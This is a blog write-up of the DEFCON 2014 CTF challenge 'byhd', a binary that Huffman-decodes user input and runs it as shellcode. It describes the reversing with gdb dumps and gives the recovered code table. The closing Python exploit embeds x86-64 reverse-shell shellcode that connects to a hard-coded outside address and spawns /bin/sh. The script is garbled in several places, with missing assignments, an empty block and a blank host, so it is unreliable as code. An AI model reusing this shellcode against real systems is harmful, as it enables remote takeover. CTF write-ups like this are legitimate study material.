
DEFCON 2014 byhd writeup

daehee87 2014. 5. 21. 14:51

I solved this challenge with my teammate Acuros.

After a quick glanceing at the byhd binary, I found out that the task is straightforward. this is a fork-accepting binary which takes some user input. then, the binary runs some complicated recursive algorithm which generates a data using the user input. finally, the binary executes the generated data as a shellcode. so, what we should do is clear : analysis and reverse the algorithm inside the binary.

The binary loaded its own image file into memory then created a byte histogram by counting each bytes. 

The result of this algorithm creates this ...

0x60c470: 0x000023e2 0x000000ee 0x000000ae 0x0000004c

0x60c480: 0x00000032 0x0000001a 0x00000034 0x0000006f

0x60c490: 0x0000005b 0x00000012 0x00000025 0x0000000a

0x60c4a0: 0x00000029 0x00000020 0x00000030 0x00000059

0x60c4b0: 0x0000005b 0x00000017 0x00000036 0x00000006

0x60c4c0: 0x00000030 0x0000000a 0x00000006 0x00000006

0x60c4d0: 0x00000020 0x00000009 0x0000000b 0x0000000c

0x60c4e0: 0x00000028 0x00000002 0x00000007 0x00000010

0x60c4f0: 0x00000091 0x00000007 0x00000014 0x00000005

0x60c500: 0x00000021 0x00000043 0x00000009 0x00000003

0x60c510: 0x0000001c 0x00000017 0x00000008 0x00000004

0x60c520: 0x00000009 0x0000001b 0x00000045 0x0000000b

0x60c530: 0x00000033 0x00000018 0x00000008 0x00000007

0x60c540: 0x00000013 0x00000002 0x00000008 0x00000006

0x60c550: 0x0000000e 0x00000009 0x00000009 0x0000000b

0x60c560: 0x00000003 0x00000005 0x00000018 0x00000009

0x60c570: 0x000000b7 0x0000004f 0x00000009 0x00000028

0x60c580: 0x00000013 0x000001a3 0x0000000b 0x00000009

0x60c590: 0x000002a3 0x0000000f 0x00000007 0x00000001

0x60c5a0: 0x00000014 0x00000013 0x00000005 0x00000011

0x60c5b0: 0x00000022 0x00000001 0x0000003a 0x0000000c

... (there are 0x23e2 zeros, 0xee ones, and 0xae twos, etc)

Then, the binary converts each histogram information into an 32byte object which contains the (index, value) pair of the histogram data.  

0x607c20: 0x00608c00 0x00000000 0x00608c30 0x00000000

0x607c30: 0x00608c60 0x00000000 0x00608c90 0x00000000

0x607c40: 0x00608cc0 0x00000000 0x00608cf0 0x00000000

0x607c50: 0x00608d20 0x00000000 0x00608d50 0x00000000

0x607c60: 0x00608d80 0x00000000 0x00608db0 0x00000000

0x607c70: 0x00608de0 0x00000000 0x00608e10 0x00000000

0x607c80: 0x00608e40 0x00000000 0x00608e70 0x00000000

0x607c90: 0x00608ea0 0x00000000 0x00608ed0 0x00000000

0x607ca0: 0x00608f00 0x00000000 0x00608f30 0x00000000

0x607cb0: 0x00608f60 0x00000000 0x00608f90 0x00000000

0x607cc0: 0x00608fc0 0x00000000 0x00608ff0 0x00000000

0x607cd0: 0x00609020 0x00000000 0x00609050 0x00000000

if we inspect the object for 'zero', 'one' we can see this. The (index, value) is each located from offset 0x10, 0x1c of the object

(gdb) x/10wx 0x6082a0

0x6082a0: 0x00000000 0x00000000 0x00000000 0x00000000

0x6082b0: 0x00000000 0x00000000 0x00000000 0x000023e2

0x6082c0: 0x00000000 0x00000000

(gdb) x/10wx 0x6082d0

0x6082d0: 0x00000000 0x00000000 0x00000000 0x00000000

0x6082e0: 0x00000001 0x00000000 0x00000000 0x000000ee

0x6082f0: 0x00000000 0x00000000

After this step, the binary creates a tree structure with the 256 historgram objects. after reversing this step, I could infer the complete structure of the object (which is a node of tree).


However, the tree generation algorithm seems too comlicated to reverse. So I just skipped the tree generation part and simply inspected the generated tree with debugger.  It was evident that the tree was huffman code generation tree.

After the tree is generated, user input is decoded using this tree. It can be reversed from 0x401c07.

The huffman decoded user input is then, simply executed via mmap and call rax from 0x401ca2

So, In a nut shell, the binary creates a huffman tree with his own binary data, then takes user input(maximum 256bytes) as a huffman encoded data.  The binary decodes user data using the generated huffman tree and executes it as a shellcode. Therefore, all I need to do is encode my shellcode with huffmantree generated by the task binary. 

It seemed easy from now, I googled a huffman tree generation example source code than created the huffmantree as the task binary did. However, the generated tree was similar but different due to some unknown reason. the task binary must used slightly diffrent algorithm...? or my example huffman generation code was wrong?? I didn't know the truth, anyway rather than analyzing the tree generation algorithm, I took a different approach. I tried to hook the task binary with LD_PRELOAD then extract the generated tree inside the task binary memory. First, I patched the binary to invoke the exit() function after the tree was generated. then, I hooked the exit() using LD_PRELOAD. 

However, I couldn't figure out the pointer address of the root node :( I felt so stupid, and got angry :( , there must be some way to extract the tree out of the binary..!! After some digging, I dumped the entire heap memory out of GDB then gave it to my teamate. From this point, my teamate solved the rest of the task. He programmed a python script which extracts the tree information from the dumped memory, despite this was not a forensic challenge :) After an hour, he completed to exact the tree and we got the huffman encoding mapping.

Using this information, we encoded a remote shellcode and the task was done.

root@ubuntu:/home/meltdown# cat tree.txt 

00 0

01 100111

02 1101110

03 11000000

04 111100011

05 1111101011

06 111110011

07 1001001

08 11100011

09 1011100001

0a 101111011

0b 11001000111

0c 110010111

0d 101001101

0e 111010011

0f 11100001

10 11100010

11 1110000011

12 111110111

13 111010000001

14 111010010

15 11001000110

16 111010100011

17 111010100010

18 101001111

19 10111001001

1a 11100000011

1b 11101000001

1c 110001111

1d 1010000000001

1e 10010000001

1f 1010011001

20 1011101

21 10011000101

22 1100000101

23 110010000111

24 101010101

25 10101111

26 10111001000

27 1111000100111

28 100101111

29 1110100001

2a 10101001101

2b 101000000001

2c 10111100111

2d 1111101101

2e 10110010

2f 11100000010

30 111110001

31 1110101111

32 10101001100

33 10011000100

34 1011111001

35 1010101001001

36 10101001011

37 111010100001

38 1001000001

39 10111100110

3a 10111100101

3b 11100000001

3c 1111000100110

3d 110010000110

3e 1110101110

3f 10111100100

40 1110011

41 11000101

42 10111100011

43 110001110

44 1011111011

45 111111

46 11100000000

47 10111100010

48 11010

49 1010001011

4a 10011000011

4b 10100000000001

4c 1100100101

4d 1011111010

4e 110010000101

4f 1010111001

50 101011101

51 10101110001001

52 10011011

53 11101010011

54 1101111101

55 11000100

56 101010001011

57 10101110001000

58 1011000001

59 10101110000111

5a 1010101001000

5b 101001001

5c 10111100001

5d 101110011

5e 101010001010

5f 101100001

60 11011001

61 10010101

62 1101101001

63 1111101010

64 10110001

65 11110011

66 110010110

67 101110001

68 10101011

69 11001111

6a 101010001001

6b 10101001010

6c 111010001

6d 1110101101

6e 111100101

6f 110110001

70 100101110

71 1111000100101

72 10010001

73 10100011

74 1010110

75 11100101

76 1010001010

77 10011000010

78 1110101100

79 11111000001

7a 111010100000

7b 101010001000

7c 10101001001

7d 11100100

7e 111100000111

7f 11001000101

80 1010011101

81 10011000001

82 1111000100100

83 1100001

84 100101101

85 10010100

86 101001000

87 1111000100011

88 1010001001

89 111101

8a 10101001000

8b 111011

8c 111100000110

8d 10100001

8e 1010101000111

8f 1111000100010

90 110110000

91 1010101000110

92 101010000111

93 1111000100001

94 111100000101

95 1111000100000

96 110010000100

97 10101110000110

98 1010001000

99 1010101000101

9a 101010000110

9b 1010101000100

9c 10011000000

9d 10101110000101

9e 1111100000011

9f 101000000000001

a0 11001000100

a1 1111100000010

a2 1010101000011

a3 1111100000001

a4 1010101000010

a5 1111100000000

a6 101010000101

a7 101010000100

a8 1100100100

a9 1010101000001

aa 1010101000000

ab 1010111000111

ac 1001100111

ad 10101110000100

ae 101010000011

af 10101110000011

b0 11111010001

b1 100100000001

b2 101010000010

b3 10101110000010

b4 1001100110

b5 101010000001

b6 1110101011

b7 101010000000

b8 11011110

b9 10111100000

ba 1111000101

bb 1010011100

bc 1111001001

bd 110010000011

be 1111101100

bf 110000011

c0 10110011

c1 1101111100

c2 101000001

c3 110110101

c4 1111101001

c5 1111001000

c6 1111100001

c7 1100110

c8 110111111

c9 1001100101

ca 10100000011

cb 10101110000001

cc 1010100111

cd 1010111000110

ce 1110101010

cf 101000000000000

d0 11001010

d1 10101000111

d2 111100000100

d3 10100000010

d4 1001100100

d5 1010111000101

d6 1001100011

d7 100100000000

d8 10111111

d9 101010100111

da 10100000001

db 111100000011

dc 100100001

dd 10101110000000

de 101010100110

df 111100000010

e0 11011011

e1 101010100101

e2 10111110001

e3 11100000101

e4 110010011

e5 111100001

e6 1011000000

e7 10101000110

e8 101101

e9 11001110

ea 1011100000

eb 11000110

ec 111110010

ed 11111010000

ee 110010000010

ef 110010000001

f0 101111010

f1 110010000000

f2 111010000000

f3 1011100101

f4 1100000100

f5 11101010010

f6 10111110000

f7 1010011000

f8 10011010

f9 111100000001

fa 111100000000

fb 11100000100

fc 10100101

fd 1101101000

fe 100101100

ff 1000

root@ubuntu:/home/meltdown# cat 

from socket import socket, AF_INET, SOCK_STREAM

int_to_bin = dict()

with open('tree.txt', 'r') as f:

    data =

    lines = data.split('\n')

    for line in lines:

        line = line.strip()

        if not line:


        k, v = line.split(' ')

        int_to_bin[chr(int(k, 16))] = v

shellcode = "\x48\x31\xC0\xB0\x01\x48\x89\xc6\x48\xFF\xC0\x48\x89\xC7\x48\x31\xD2\xB2\x06\xB0\x29\x0F\x05\x48\x89\xC7\x48\xB9\xFD\xFF\x7A\x69\x6E\x23\x26\x06\x66\x83\xF1\xFF\x51\x48\x89\xE6\x48\x31\xD2\xB2\x10\xB0\x2A\x0F\x05\x48\x31\xC0\x48\x31\xF6\xB0\x21\x0F\x05\x48\xFF\xC6\xB0\x21\x0F\x05\x48\x31\xC0\x48\x31\xD2\x50\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x48\x89\xE7\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05"

s = socket(AF_INET, SOCK_STREAM)

s.connect(('', 9730))

payload  = '\x00\x01\x00\x00'

enced_shellcode = ''.join([int_to_bin[byte] for byte in shellcode])

enced_shellcode = enced_shellcode + '0' * (8-len(enced_shellcode)%8)


tmp = []

for x in xrange(len(enced_shellcode)/8):

    tmp.append(enced_shellcode[x*8: (x+1)*8][::-1])

enced_shellcode = ''.join(tmp)


enced_shellcode = hex(int(enced_shellcode, 2))[2:-1]

print enced_shellcode

enced_shellcode = enced_shellcode.decode('hex')

payload += enced_shellcode


print s.recv(10240)
